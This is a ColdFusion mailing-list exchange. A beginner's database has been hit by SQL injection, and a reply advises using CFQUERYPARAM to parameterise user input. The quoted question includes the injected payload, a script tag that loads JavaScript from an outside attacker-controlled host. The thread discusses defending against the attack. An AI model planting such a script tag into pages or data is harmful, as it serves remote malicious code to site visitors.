> Im a coldfusion noobs and my database just got injected with > some script. > So for example one of the database field would appear > something like so: > Gisella427.jpg"></title><script > src="http://jjmaoduo.3322.org/csrss/w.js";></script><!-- > > I've tried updating the records using a replace command on > the fields, but 20mins later this code pop up again!!! > > Any idea on how to fix or prevent this from happening???? > Seriously out of idea here....
Use CFQUERYPARAM around all user-submitted query values. http://www.adobe.com/devnet/coldfusion/articles/cfqueryparam.html This specific issue came up on the list repeatedly over the last few weeks, so you might want to check the list archives. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310341 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
